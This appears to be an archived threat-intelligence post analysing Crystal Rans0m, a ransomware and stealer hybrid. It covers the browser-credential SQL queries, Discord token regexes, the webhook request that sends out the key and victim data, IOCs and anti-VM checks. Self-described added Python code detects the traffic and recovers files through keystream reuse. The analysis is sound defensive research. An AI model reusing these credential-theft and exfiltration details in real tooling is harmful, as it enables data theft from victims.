{
	"id": "3eeffcb6-06f3-4512-968e-0cd7fe80f4a5",
	"created_at": "2026-04-06T00:12:12.527004Z",
	"updated_at": "2026-04-10T03:37:08.595785Z",
	"deleted_at": null,
	"sha1_hash": "d2bf540cc8f1d9a7a0337e34cb61d79754087a1d",
	"title": "Crystal Rans0m: Emerging hybrid ransomware with stealer capabilities",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1086855,
	"plain_text": "Crystal Rans0m: Emerging hybrid ransomware with stealer capabilities\r\nBy Lidia López Sanz, Senior Threat Intelligence Analyst\r\nPublished: 2024-09-12 · Archived: 2026-04-05 14:07:58 UTC\r\nResearch \u0026 Threat Intel · Last updated: 20 Sep 2024\r\nCrystal Rans0m is a previously undocumented hybrid ransomware family written in Rust and first seen in the wild on September 2nd, 2023. Interestingly, it not only encrypts the victim’s files and demands a ransom for their release, but also steals sensitive information from the infected systems.\r\nThis dual-threat approach lets attackers double their leverage over victims, potentially increasing their chances of monetizing an attack. It can therefore be categorized as Stealer-as-a-Ransomware, a term coined by Zscaler researchers in a publication about RedEnergy.\r\nRegarding attribution, Crystal Rans0m does not share similarities with any other malware family, and it has not been attributed to any known threat actor. In this post, we analyze the technical capabilities of Crystal Rans0m, describing in detail both its ransomware and stealer components.\r\nEmergent threat: Hybrid ransomware\r\nSince double extortion became prevalent, with the most notable ransomware groups publishing confidential information stolen from victims on a Data Leak Site (DLS), there have been multiple publications reporting multi-stage attack chains that involve both an information stealer and a final ransomware payload.\r\nBy combining ransomware and stealer capabilities, attackers maximize the efficacy of their campaigns. Even if the ransom is not paid, the stolen data can be sold or used for further attacks, such as identity theft or spear phishing. It is very uncommon to observe both malware categories in a single executable file. 
However, this is the case for Crystal Rans0m, RedEnergy, and FTCODE.\r\nCurrently, ransomware groups seem to prefer to separate data exfiltration from encryption, but it is important to pay attention to this emerging threat and to how hybrid ransomware operators innovate on their TTPs.\r\nAnother documented hybrid is RAT-as-a-Ransomware: VenomRAT and Anarchy Panel RAT both embed a ransomware component.\r\nTechnical analysis\r\nThis section focuses on the sample with sha256 15219aa22db99f064c47c224a205cdd3ed438dabd2d2593242ed2882e6458311, which was the latest found at the time of the analysis. The technical analysis first gives an overview of the initial actions carried out by the malware, followed by its main characteristics as a stealer and as a ransomware. Finally, as Outpost24’s KrakenLabs team detected a new sample before publishing this blog post, a final section covers the peculiarities of a newer sample from August 2024.\r\nhttps://outpost24.com/blog/crystal-ransom-hybrid-ransomware/\r\nPage 1 of 20\n\nKey functionalities\r\nEncrypts the victim’s data to leverage for ransom demands\r\nRequests ransom payment in Monero, enhancing anonymity\r\nAs a stealer, it is mainly focused on browsers, but it also targets Steam, Discord, and Riot Games clients\r\nUses a Discord webhook to exfiltrate stolen data and the encryption key and nonce (a webhook is a one-way channel, so it serves exfiltration rather than command and control)\r\nInitial actions\r\nPrior to any stealing or ransomware operations, Crystal loads its configuration:\r\nDecrypting the Discord webhook used for exfiltration\r\nCrystal uses a Discord webhook for exfiltrating both stolen data and the key and nonce used for encryption. This webhook is hardcoded but it is encrypted and encoded. 
So, as part of its initial configuration, it decrypts the webhook using a hardcoded key (also used to decrypt part of the ransom note) and simple XOR and array operations, and then base64-decodes the result.\r\nGenerating paths for targeted software\r\nAs part of its configuration, it also generates the paths of the data directories of the targeted software (under “%localappdata%” or “%appdata%”). For the browsers, it generates two separate sets:\r\nC:\\Users\\MyPC\\AppData\\Roaming\\Opera Software\\Opera Stable\r\nC:\\Users\\MyPC\\AppData\\Roaming\\Opera Software\\Opera GX Stable\r\nC:\\Users\\MyPC\\AppData\\Local\\Amigo\\User Data\r\nC:\\Users\\MyPC\\AppData\\Local\\Torch\\User Data\r\nC:\\Users\\MyPC\\AppData\\Local\\Kometa\\User Data\r\nC:\\Users\\MyPC\\AppData\\Local\\Orbitum\\User Data\r\nC:\\Users\\MyPC\\AppData\\Local\\CentBrowser\\User Data\r\nC:\\Users\\MyPC\\AppData\\Local\\7Star\\7Star\\User Data\r\nC:\\Users\\MyPC\\AppData\\Local\\Sputnik\\Sputnik\\User Data\r\nC:\\Users\\MyPC\\AppData\\Local\\Google\\Chrome SxS\\User Data\r\nC:\\Users\\MyPC\\AppData\\Local\\Vivaldi\\User Data\r\nC:\\Users\\MyPC\\AppData\\Local\\Microsoft\\Edge\\User Data\r\nC:\\Users\\MyPC\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\r\nC:\\Users\\MyPC\\AppData\\Local\\Iridium\\User Data\r\nC:\\Users\\MyPC\\AppData\\Local\\uCozMedia\\Uran\\User Data\r\nC:\\Users\\MyPC\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\r\nC:\\Users\\MyPC\\AppData\\Local\\Google\\Chrome\\User Data\r\nIt also generates paths for standard Discord, Discord Canary, and Discord PTB.\nInfostealer component\nMalware working directory\nWhen grabbing a directory or a file, or parsing the content of a file, Crystal first creates a custom malware working folder under “%Temp%\\wintemp.\\”. 
Then, the targeted file is copied to the malware working folder, read, and deleted when it is no longer necessary.\nThe deletion process does not use the DeleteFileA/W APIs. Instead, Crystal first opens the file with the FILE_FLAG_DELETE_ON_CLOSE flag, which causes the file to be deleted once all its handles are closed. Then, it renames the file and moves it to the “%Temp%” directory using the SetFileInformationByHandle API, with FileRenameInfo as the FileInformationClass parameter and “\\\\?\\%Temp%\\rm-” as the new path.\nThis behavior is not specific to this malware family but to the Rust library used to perform the deletion (the remove_dir_all crate), so the same rename-then-delete pattern also shows up in benign Rust software and is a weak detection signal on its own.\nStealing browser information\nGetting the browser’s master key\nIn order to steal the master key, Crystal iterates the browser paths and checks whether they are present on the host. If so, it tries to locate the browser’s Local State file to extract the master key.\nCrystal creates a temporary malware working folder under “%Temp%\\wintemp.\\” and tries to copy the browser’s “\\User Data\\Local State” file into it.\nIf successful, it reads the file’s content and looks for the “encrypted_key” value under the “os_crypt” key. Next, it base64-decodes the retrieved value, removes the “DPAPI” prefix that precedes the blob, and calls the CryptUnprotectData API to obtain the master key.\nCollecting browser information\nOnce the master key is successfully obtained, Crystal iterates the files inside the browser’s “\\User Data” directory in order to locate the “\\Default” folder.\nThe following table shows the targeted SQLite databases, along with the SQL queries used to collect information from them. 
Again, if found, the targeted files are copied into a malware working folder and read from there.\nFile / SQL queries\r\n\u003cBrowser path\u003e\\User Data\\Default\\Login Data\r\nSELECT origin_url, username_value, password_value FROM logins\r\n\u003cBrowser path\u003e\\User Data\\Default\\History\r\nselect term from keyword_search_terms\r\nselect current_path, tab_url from downloads\r\nselect url from downloads_url_chains\r\n\u003cBrowser path\u003e\\User Data\\Default\\Cookies and \u003cBrowser path\u003e\\User Data\\Default\\Network\\Cookies\r\nselect host_key, name, encrypted_value, path from cookies\r\nWhen the cookie information is retrieved, the “encrypted_value” is decrypted using AES with the previously obtained master key.\r\nStealing Discord information\r\nThe stealer targets Discord user data in two ways:\r\n1. From browsers\r\n2. From the Discord desktop application\r\nGetting Discord user tokens from browsers\r\nAfter getting the master key and calling the browser stealing function, it tries to locate the “\\Local Storage\\leveldb” path inside the browser’s Default path. If found, it iterates it looking for “.log” or “.ldb” files. If any are found, it searches their content for Discord user tokens using the following regex:\r\n[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{25,110}\r\nFrom Discord local client\r\nThe stealer tries to locate the Discord paths and, if any are found, it extracts the master key with an approach equivalent to the one used for browsers. 
Then, it tries to locate any “.log” or “.ldb” files inside “leveldb” subpaths. In this case, it looks for encrypted tokens using the following regex:\r\ndQw4w9WgXcQ:[^\\\"]*\r\nThe retrieved token is base64-encoded, so it is first decoded and then decrypted using AES with the retrieved master key.\r\nFinal steps and data exfiltration\r\nGetting the victim’s IP\r\nPrior to exfiltrating the information, Crystal tries to obtain the victim’s public IP from “hxxp://ifconfig[.]me”. This IP is most likely used as an identifier for the victim, as shown in a later section (the “Exfiltrating the key” subsection). This first webhook message has the same structure as the later key-exfiltration request; however, in this first contact the “Key” and “Nonce” fields carry no real value, as they have not yet been generated, and each is filled with an underscore.\r\nGrabbing Steam files\r\nIf Steam is installed on the host (checked by searching for the directory “C:\\Program Files (x86)\\Steam”), it tries to grab the “loginusers.vdf” and “ssfn” files.\r\nFirst, it tries to locate the “Config” subdirectory and the “loginusers.vdf” file inside it. 
Then, it iterates the Steam directory looking for “ssfn” files (Steam Sentry Files, which Steam Guard uses to mark a device as trusted, and which therefore let whoever holds them reuse the account from another machine).\r\nGrabbing Riot Games files\r\nThe stealer tries to locate the “%LocalAppData%\\Riot Games\\Riot Client\\Data” directory and, if found, grabs all files it contains (including subdirectories).\r\nExfiltrating information\r\nThe collected information is dumped into in-memory files and exfiltrated as multipart form data, each part carrying a “Content-Disposition” header with “name” and “filename” directives.\r\nSee below an example of this header for the collected browser passwords:\r\nContent-Disposition: form-data; name=\"passwds\"; filename=\"passwords.txt\"\r\nThe table below summarizes the information exfiltrated:\r\nName Filename Description\r\npasswds passwords.txt Collected browser passwords\r\nhterms terms.txt Collected browser search history\r\nhdownload downloads.txt Collected browser downloads\r\nvisited visited.txt Collected browser visited sites\r\ncookies cookies.txt Collected browser cookies\r\ntkns.txt tkns.txt Collected Discord tokens\r\nsteam.zip steam.zip Grabbed Steam files\r\nriot.zip riot.zip Grabbed Riot files\r\nHybrid Ransomware component\r\nAs a hybrid ransomware, it iterates the system folders, searching for files to be encrypted. 
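Before turning to the encryption routine, the exfiltration traffic described in this section can be turned into a detection. The following is an added example written for this page, not code from the Outpost24 post or from the malware: it classifies captured HTTP requests, as a sandbox or a TLS-inspecting proxy would see them, into the first-contact webhook message with underscore placeholders, the later message carrying the key and nonce, the IP-only message of the August 2024 sample discussed further down, and the multipart upload of stolen data recognized by its part names. The sample requests, the webhook ID and token, and the hex rendering of the key and nonce are constructed assumptions.

```python
import json
import re

# Added example (not code from the Outpost24 post): classify captured HTTP requests as the
# Crystal Rans0m webhook traffic described in the post. Everything in sample_requests() is
# constructed; the webhook ID and token are placeholders, not the real IOCs, and the hex
# rendering of the key and nonce is an assumption (the post does not say how they are formatted).
FENCE = chr(96) * 3  # the ``` markers wrapped around the message content
WEBHOOK_PATH = re.compile(r'^/api/webhooks/([0-9]+)/[A-Za-z0-9_-]+$')
CONTENT = re.compile(
    '^' + re.escape(FENCE) + r'IP: (?P<ip>[^\n]+)'
    r'(?:\nKey: (?P<key>[^\n]+)\nNonce: (?P<nonce>[^\n]+))?' + re.escape(FENCE) + '$')
PART_NAME = re.compile(r'name="([^"]+)"')
CRYSTAL_PARTS = {'passwds', 'hterms', 'hdownload', 'visited', 'cookies',
                 'tkns.txt', 'steam.zip', 'riot.zip'}


def inspect_request(req):
    """Return a finding dict for a Crystal-style webhook POST, or None for anything else."""
    if req.get('method') != 'POST' or req.get('host') != 'discord.com':
        return None
    m = WEBHOOK_PATH.match(req.get('path', ''))
    if not m:
        return None
    finding = {'webhook_id': m.group(1), 'kind': None}
    ctype = req.get('content_type', '')
    body = req.get('body', '')
    if ctype.startswith('application/json'):
        try:
            content = json.loads(body).get('content', '')
        except (ValueError, AttributeError):
            return None
        cm = CONTENT.match(content)
        if not cm:
            return None
        finding['victim_ip'] = cm.group('ip')
        key, nonce = cm.group('key'), cm.group('nonce')
        if key is None:
            finding['kind'] = 'crystal_ip_only'        # August 2024 sample: no Key/Nonce lines
        elif key == '_' and nonce == '_':
            finding['kind'] = 'crystal_first_contact'  # placeholders sent before key generation
        else:
            finding['kind'] = 'crystal_key_exfil'      # the values that decrypt the victim
            finding['key'], finding['nonce'] = key, nonce
    elif ctype.startswith('multipart/form-data'):
        hits = CRYSTAL_PARTS & set(PART_NAME.findall(body))
        if not hits:
            return None
        finding['kind'] = 'crystal_stolen_data'
        finding['parts'] = sorted(hits)
    else:
        return None
    return finding


def scan_requests(requests):
    return [f for f in (inspect_request(r) for r in requests) if f]


def sample_requests():
    # Constructed traffic: one request of each kind plus two benign ones.
    hook = '/api/webhooks/1234567890123456789/constructedTokenValue_abc-XYZ'

    def msg(text):
        return json.dumps({'content': FENCE + text + FENCE})

    multipart = ('--b\r\nContent-Disposition: form-data; name="passwds"; filename="passwords.txt"\r\n\r\n'
                 'https://example.test user pass\r\n--b\r\nContent-Disposition: form-data; '
                 'name="tkns.txt"; filename="tkns.txt"\r\n\r\n(constructed)\r\n--b--\r\n')
    return [
        {'method': 'POST', 'host': 'discord.com', 'path': hook, 'content_type': 'application/json',
         'body': msg('IP: 203.0.113.7\nKey: _\nNonce: _')},
        {'method': 'POST', 'host': 'discord.com', 'path': hook,
         'content_type': 'multipart/form-data; boundary=b', 'body': multipart},
        {'method': 'POST', 'host': 'discord.com', 'path': hook, 'content_type': 'application/json',
         'body': msg('IP: 203.0.113.7\nKey: ' + 'ab' * 32 + '\nNonce: ' + 'cd' * 8)},
        {'method': 'POST', 'host': 'discord.com', 'path': hook, 'content_type': 'application/json',
         'body': msg('IP: 203.0.113.7')},
        {'method': 'POST', 'host': 'discord.com', 'path': hook, 'content_type': 'application/json',
         'body': json.dumps({'content': 'build finished'})},  # a benign webhook post
        {'method': 'GET', 'host': 'discord.com', 'path': '/api/v9/gateway'},
    ]


if __name__ == '__main__':
    for finding in scan_requests(sample_requests()):
        print(finding)
```

Anything classified as crystal_key_exfil is worth retaining as evidence, since the key and nonce fields are exactly the values needed to decrypt the victim’s files, and the webhook_id is the stable part of the URL to block and hunt on.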
Apart from excluding the Windows system folders, it contains a hardcoded set of directories to be excluded from encryption:\r\nAppData\r\nProgramData\r\nProgram Files\r\nProgram File(x86)\r\nLocal Settings\\\\Temp\r\nCrystal Rans0m uses Salsa20 for encryption, a symmetric stream cipher that expands a 256-bit key, a 64-bit nonce and a 64-bit block counter into 64-byte keystream blocks.\r\nIt works by generating a keystream of pseudo-random bytes, which is XORed with the plaintext to be encrypted; decryption is the same XOR with the same keystream.\r\nGenerating the key\r\nA random seed of 32 bytes is generated using the BCryptGenRandom API during the first stages of execution. The BCRYPT_USE_SYSTEM_PREFERRED_RNG flag is set, which implies the use of “the system-preferred random number generator algorithm”.\r\nTwo pseudo-random values are generated: a 32-byte key and an 8-byte nonce. These two values, along with four hardcoded 4-byte constants and an 8-byte counter, are used to build the initial 64-byte internal state.\r\nFigure 1. Salsa20 internal state matrix.\r\nThis process is executed for each file to encrypt, resulting in the same initial matrix for every file. Because the matrix, and therefore the keystream, is identical for every file, any two encrypted files share keystream bytes at the same offsets: XORing two ciphertexts cancels the keystream, and a known plaintext for one file (a standard file header, for instance) recovers the keystream for the same byte range of every other file.\r\nSalsa20 rounds\r\nThe Salsa20 implementation used to generate the keystream can be seen below:\r\nFigure 2. Salsa20 implementation (C/C++ code implementation from: https://en.wikipedia.org/wiki/Salsa20).\r\nFile encryption\r\nThe encryption process starts by reading the file content. Then, each byte is XORed with the corresponding keystream byte. 
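The keystream generation of Figure 2 and the per-file XOR and base64 steps, as an added example written for this page (not code from the Outpost24 post or from the malware): a Salsa20/20 implementation following the Wikipedia reference the post cites, the file transformation the post describes, and the consequence of reusing the same initial matrix for every file. The key, nonce and file contents are constructed, and the assumption that the block counter restarts at 0 for each file is stated in the code.

```python
import base64
import struct

# Added example (not code from the Outpost24 post): Salsa20/20 keystream generation as in the
# Wikipedia reference implementation the post cites, followed by the XOR-and-base64 file
# transformation the post describes. Key, nonce and file contents below are constructed.
SIGMA = b'expand 32-byte k'  # the four hardcoded 4-byte constants of Figure 1
MASK = 0xFFFFFFFF


def rotl(v, c):
    return ((v << c) | (v >> (32 - c))) & MASK


def quarter_round(x, a, b, c, d):
    # Salsa20 quarter-round applied in place to four words of the 16-word state.
    x[b] ^= rotl((x[a] + x[d]) & MASK, 7)
    x[c] ^= rotl((x[b] + x[a]) & MASK, 9)
    x[d] ^= rotl((x[c] + x[b]) & MASK, 13)
    x[a] ^= rotl((x[d] + x[c]) & MASK, 18)


def salsa20_block(key, nonce, counter):
    """Return the 64-byte keystream block for (32-byte key, 8-byte nonce, 64-bit counter)."""
    if len(key) != 32 or len(nonce) != 8:
        raise ValueError('Salsa20 needs a 32-byte key and an 8-byte nonce')
    c = struct.unpack('<4I', SIGMA)
    k = struct.unpack('<8I', key)
    n = struct.unpack('<2I', nonce)
    # Initial matrix of Figure 1: constants on the diagonal, key words, nonce, block counter.
    state = [c[0], k[0], k[1], k[2],
             k[3], c[1], n[0], n[1],
             counter & MASK, (counter >> 32) & MASK, c[2], k[4],
             k[5], k[6], k[7], c[3]]
    x = list(state)
    for _ in range(10):  # 20 rounds: alternating column and row rounds
        quarter_round(x, 0, 4, 8, 12)
        quarter_round(x, 5, 9, 13, 1)
        quarter_round(x, 10, 14, 2, 6)
        quarter_round(x, 15, 3, 7, 11)
        quarter_round(x, 0, 1, 2, 3)
        quarter_round(x, 5, 6, 7, 4)
        quarter_round(x, 10, 11, 8, 9)
        quarter_round(x, 15, 12, 13, 14)
    return struct.pack('<16I', *[(x[i] + state[i]) & MASK for i in range(16)])


def keystream(key, nonce, length):
    # Assumption: the block counter restarts at 0 for every file, which is what building
    # the same initial matrix for each file implies.
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += salsa20_block(key, nonce, counter)
        counter += 1
    return bytes(out[:length])


def xor_bytes(a, b):
    return bytes(x ^ y for x, y in zip(a, b))  # truncates to the shorter input


def crystal_encrypt_file(content, key, nonce):
    """XOR the file with the keystream, then base64-encode the result."""
    return base64.b64encode(xor_bytes(content, keystream(key, nonce, len(content))))


def crystal_decrypt_file(blob, key, nonce):
    data = base64.b64decode(blob)
    return xor_bytes(data, keystream(key, nonce, len(data)))


def recover_keystream_prefix(blob, known_plaintext):
    """Keystream reuse: ciphertext XOR known plaintext yields the keystream for that range."""
    return xor_bytes(base64.b64decode(blob), known_plaintext)


def decrypt_with_recovered_keystream(blob, ks_prefix):
    """Decrypt as many leading bytes of another file as the recovered keystream covers."""
    return xor_bytes(base64.b64decode(blob), ks_prefix)


if __name__ == '__main__':
    key, nonce = bytes(range(32)), bytes(range(8))  # constructed stand-ins for the random values
    report = b'%PDF-1.7 quarterly figures (constructed file A)'
    contract = b'%PDF-1.7 supplier contract (constructed file B)'
    blob_a = crystal_encrypt_file(report, key, nonce)
    blob_b = crystal_encrypt_file(contract, key, nonce)
    # Knowing file A in full recovers keystream that also opens file B, without the key.
    ks = recover_keystream_prefix(blob_a, report)
    print(decrypt_with_recovered_keystream(blob_b, ks))
```

Running the block prints the second file decrypted with keystream recovered from the first, with no knowledge of the key; an incident responder who can identify one encrypted file whose original contents are fully known (an installer or a standard template, for example) can recover as many keystream bytes as that file is long and apply them to every other encrypted file.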
Finally, the encrypted content is encoded in base64 before being written, so encrypted files are about a third larger than the originals.\r\nThe ransomware does not modify the extension of the encrypted files.\r\nExfiltrating the key\r\nBoth the 32-byte key and the 8-byte nonce are exfiltrated via the Discord webhook, using a POST request. Whoever captures this request (for example, from a sandbox run or a TLS-inspecting proxy) therefore holds everything needed to decrypt the victim’s files.\r\nThe communication between the malware and Discord is encrypted with TLS, for which Crystal uses the SChannel EncryptMessage API.\r\nThe parameters and content of the request before encryption are as follows:\r\nPOST /api/webhooks/\u003cwebhook\u003e HTTP/1.1\r\ncontent-type: application/json\r\ncontent-length: \u003csize\u003e\r\naccept: */*\r\nhost: discord.com\r\n{\\\"content\\\": \\\"```IP: \u003cvictim’s IP\u003e\\\\nKey: \u003c32B generated Key\u003e\\\\nNonce: \u003c8B Nonce\u003e```\\\"}\r\nRansom note\r\nThe ransom note is written to “%Temp%\\gui.hta” and shown using mshta.exe (the Microsoft HTML Application Host, which executes .HTA (HTML Application) files). The main content of the ransom note is hardcoded in plain text. The rest of the information (HTML-formatted) is encrypted with XOR (using “0x9” as the key in the analyzed sample) and encoded in base64.\r\nIt creates a batch file in the startup folder, responsible for reloading the ransom note on each restart.\r\nNewer version\r\nWhen we were about to publish this blog post, we found a new sample (sha256 bed70b08cf8b00b4e6b04acd348b5e0343d207f3083e1c58261679706bd10318) from 6 August 2024. This section summarizes the main aspects of this new sample in comparison to the one analyzed in the previous sections and to the older ones.\r\nThe main aspect to highlight is that we did not observe ransomware behavior in this new sample. 
This change is reflected in the code in several ways, the main ones being: no Salsa20 code is observed; the Rust libraries related to this feature have been removed; the requests no longer contain the “Key” and “Nonce” fields and now only send the victim’s IP; and there are no references to “mshta.exe” or to the ransom note filename (“gui.hta”).\r\nThis new sample leads us to the hypothesis that Crystal is a modular solution that allows the attacker to choose the modules to deploy for each attack.\r\nAnother change is that this new sample contains a new Discord webhook, which is hardcoded in plain text, as opposed to the encrypted webhook of the previous version.\r\nAnother relevant aspect is that this sample applies several techniques to avoid emulation and debugging. Most of them were observed in older versions but were not present in the sample analyzed in the previous sections. This new sample adds a new one based on registry checks.\r\nAnti-VM techniques\r\nIt checks whether a hardcoded set of registry keys associated with VM software is present on the infected host, using the RegOpenKeyExW API. If any key is found, it aborts execution. The list of queried registry keys can be found in Annex 2.\r\nThe stealer searches the running processes for processes associated with VM software. The searched process names are:\r\nVmtoolsd.exe\r\nVmwaretrat.exe\r\nVmwareuser.exe\r\nvm_process.exe\r\nVmRemoteGuest.exe\r\nFinally, it checks whether any of the following drivers and libraries associated with VM software is present on the host, using the CreateFileW API:\r\nC:\\windows\\System32\\Drivers\\Vmmouse.sys\r\nC:\\windows\\System32\\Drivers\\vm3dgl.dll\r\nC:\\windows\\System32\\vmdum.dll\r\nC:\\windows\\System32\\Drivers\\VBoxGuest.sys\r\nIt also contains a time-based check to hinder the debugging process. 
In order to do so, it calls the GetLocalTime and SystemTimeToFileTime APIs twice, subtracts the results and checks whether the difference is higher than 1,000 (FILETIME values are expressed in 100-nanosecond units). If so, it ends its execution.\r\nAgain, it iterates the running processes, this time comparing them against a list containing processes associated with both VMs and analysis tools. Annex 2 also contains the list of processes searched in this check.\r\nAttribution\r\nThe ransom note includes some information that could serve as a starting point to attribute Crystal Rans0m activity to a threat actor. The analyzed samples contain a Monero wallet address and a Session ID in the ransom note, as well as the Discord exfiltration webhook. These indicators have not been observed in any other campaigns or malware samples; therefore, we have not been able to attribute Crystal Rans0m to any publicly known threat actor.\r\nSomething else that caught our attention is the use of the Session instant messaging application (getsession[.]org) as the communication channel between the ransomware operator and the victim for negotiation. As of August 2024, it is highly unusual to see ransomware groups using Session: we have located only dozens of ransom notes carrying a unique Session ID, including, for instance, those of SEXi ransomware. The most frequently observed contact methods for ransomware negotiations are email, Jabber, and Tox.\r\nRansom note\r\nUpon execution, a new window with the ransom note is shown on screen. It has the title “Crystal Rans0m”, which revealed the name the authors originally gave to the malware. 
The message announces to victims that all their files have been encrypted and that, if they want to restore access to their data, they must pay US$50 in XMR (Monero) to the attackers and contact them by opening a chat conversation on Session.\r\nFigure 3. Ransom note shown to the victim (sample 15219aa22db99f064c47c224a205cdd3ed438dabd2d2593242ed2882e6458311)\r\nOlder versions contained a countdown instead of the hardcoded message observed above, which contains a spelling error.\r\nFigure 4. Ransom note shown to the victim (sample b027fe1e1e97d980de593cfd265d004b310c7655d3ee27ea3f10beaf70285e22)\r\nIt is worth mentioning that in the older sample retrieved, the ransom note was supposed to contain a qTox ID, but it seems to be a draft, as neither a real ID nor a cryptocurrency wallet was written. It also demanded a higher amount.\r\nFigure 5. Ransom note shown to the victim (sample 693fb42336167d5432a807fcb9afcac7002113fc37b05a2d3aa61c1356256c52)\r\nThe choice of a Monero wallet to collect the ransom prevents us from analyzing how effective, widespread, and profitable the use of Crystal Rans0m has been. Unlike Bitcoin and other major cryptocurrencies, Monero transactions can be verified but are anonymous and cannot be traced to the originating or recipient wallet address. That is why many threat actors prefer Monero over more popular and easier-to-use cryptocurrencies like Bitcoin and Ethereum.\r\nVictimology\r\nAlthough there is a low count of malware samples available, analyzing the origin of VirusTotal submissions gives some clue of the location of the potential victims so far. 
Notably, we have observed a higher number of submissions from Italy and Russia.\r\nHowever, the motivation of the threat actor behind Crystal Rans0m is financial gain; therefore, we do not assess that the adversary aims at specific countries or industries, but rather targets indiscriminately.\r\nCountry Submissions Percent\r\nItaly 4 20%\r\nRussian Federation 4 20%\r\nUkraine 2 10%\r\nGeorgia 1 5%\r\nLithuania 1 5%\r\nChina 1 5%\r\nUnited States 1 5%\r\nPeru 1 5%\r\nUnited Kingdom 1 5%\r\nPhilippines 1 5%\r\nArgentina 1 5%\r\nSweden 1 5%\r\nBrazil 1 5%\r\nKey takeaways\r\nCrystal Rans0m is a rather simple, low-prevalence malware that nevertheless has some distinct characteristics worthy of attention. Its combination of info-stealing and file encryption capabilities puts this malware family in the rare category of Stealer-as-a-Ransomware. Crystal Rans0m exemplifies the dangerous potential of this hybrid threat, emphasizing the need for advanced security measures and comprehensive incident response strategies.\r\nOrganizations must stay vigilant and proactive to protect themselves from these dual threats that aim to steal sensitive data and encrypt files at the same time. Outpost24 KrakenLabs’ analysts will continue to monitor the state of hybrid ransomware and analyze its potential to become a trend within the ransomware landscape.\r\nProtect your organization with Threat Intelligence\r\nOutpost24’s Threat Context lets you monitor emerging threats such as Crystal Rans0m, track your organization’s footprint on the dark web, and gain contextual intelligence around threat actors and their campaigns. Book a live demo today.\r\nUnsure where to start with threat intelligence? 
Speak to an expert about the best fit for your organization.\r\nTTPs\r\nExecution\r\nT1059 – Command and Scripting Interpreter\r\nPersistence\r\nT1547.001 – Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder\r\nDefense Evasion\r\nT1027 – Obfuscated Files or Information\r\nT1140 – Deobfuscate/Decode Files or Information\r\nT1055 – Process Injection\r\nT1562.001 – Impair Defenses: Disable or Modify Tools\r\nT1497 – Virtualization/Sandbox Evasion\r\nDiscovery\r\nT1082 – System Information Discovery\r\nCollection\r\nT1555.003 – Credentials from Password Stores: Credentials from Web Browsers\r\nExfiltration\r\nT1567.004 – Exfiltration Over Web Service: Exfiltration Over Webhook\r\nImpact\r\nT1486 – Data Encrypted for Impact\r\nT1657 – Financial Theft\r\nIOCs\r\nCrystal Rans0m hashes (sha256)\r\nbed70b08cf8b00b4e6b04acd348b5e0343d207f3083e1c58261679706bd10318\r\n15219aa22db99f064c47c224a205cdd3ed438dabd2d2593242ed2882e6458311\r\nb027fe1e1e97d980de593cfd265d004b310c7655d3ee27ea3f10beaf70285e22\r\n4970bd280da663f483f927f3a6c47833ebcbfe2b640ee66a309b41c7ed084375\r\n693fb42336167d5432a807fcb9afcac7002113fc37b05a2d3aa61c1356256c52\r\nDiscord webhooks used for data exfiltration\r\nhxxps://discord[.]com/api/webhooks/1270187531933057115/OTYZL7aHM9A-o9RxQmRvXz_YkOC_qc8MhVD3vPFP0aXhhcBkCW_FokOo\r\nhxxps://discord[.]com/api/webhooks/1144625488816525372/uYBmr5tVjy1fAqE3FP5t7jbdaWTQcY5mmRZSJavfml9zU2QqWBq-4oDV\r\nMonero cryptocurrency wallet address\r\n4A5tWDtKsqSX1bXPrjycV422D9oov73gEJxr1CUmhXMAfVqyhcmZvhPHBeW9ztrp584kkd3BW4xk9XW4PdAG3p2wMBcaRbJ\r\nSession ID\r\n05c34f70f377339720875a54bfb754a31311ed994986cfd51e7fa56114b7bd1c0f\r\nMalware working folder\r\nC:\\Users\\Administrator\\AppData\\Local\\Temp\\wintemp.[STRING]\r\nANNEX 1: Targeted software\r\nSoftware Path\r\nOpera \\Opera Software\\Opera Stable\r\nOpera \\Opera Software\\Opera GX Stable\r\nAmigo \\Amigo\\User 
Data\r\nTorch \\Torch\\User Data\r\nKometa \\Kometa\\User Data\r\nOrbitum \\Orbitum\\User Data\r\nCentBrowser \\CentBrowser\\User Data\r\n7Star \\7Star\\7Star\\User Data\r\nSputnik \\Sputnik\\Sputnik\\User Data\r\nChrome SxS \\Google\\Chrome SxS\\User Data\r\nVivaldi \\Vivaldi\\User Data\r\nMicrosoft Edge \\Microsoft\\Edge\\User Data\r\nYandex \\Yandex\\YandexBrowser\\User Data\r\nIridium \\Iridium\\User Data\r\nUran \\uCozMedia\\Uran\\User Data\r\nBrave \\BraveSoftware\\Brave-Browser\\User Data\r\nChrome \\Google\\Chrome\\User Data\r\nDiscord \\discord\r\nDiscord Canary \\discordcanary\r\nDiscord PTB \\discordptb\r\nRiot Games \\AppData\\Local\\Riot Games\\Riot Client\\Data\r\nANNEX 2: “Anti” checks\r\nRegistry keys\r\nSoftware\\Classes\\Folder\\shell\\sandbox\r\nSOFTWARE\\Microsoft\\Hyper-V\r\nSOFTWARE\\Microsoft\\VirtualMachine\r\nSOFTWARE\\Microsoft\\Virtual Machine\\Guest\\Parameters\r\nSYSTEM\\ControlSet001\\Services\\vmicheartbeat\r\nSYSTEM\\ControlSet001\\Services\\vmicvss\r\nSYSTEM\\ControlSet001\\Services\\vmicshutdown\r\nSYSTEM\\ControlSet001\\Services\\vmicexchange\r\nSYSTEM\\CurrentControlSet\\Enum\\PCI\\VEN_1AB8*\r\nSYSTEM\\CurrentControlSet\\Services\\SbieDrv\r\nSOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Sandboxie\r\nHARDWARE\\ACPI\\DSDT\\VBOX__\r\nHARDWARE\\ACPI\\FADT\\VBOX__\r\nHARDWARE\\ACPI\\RSDT\\VBOX__\r\nSOFTWARE\\Oracle\\VirtualBox Guest 
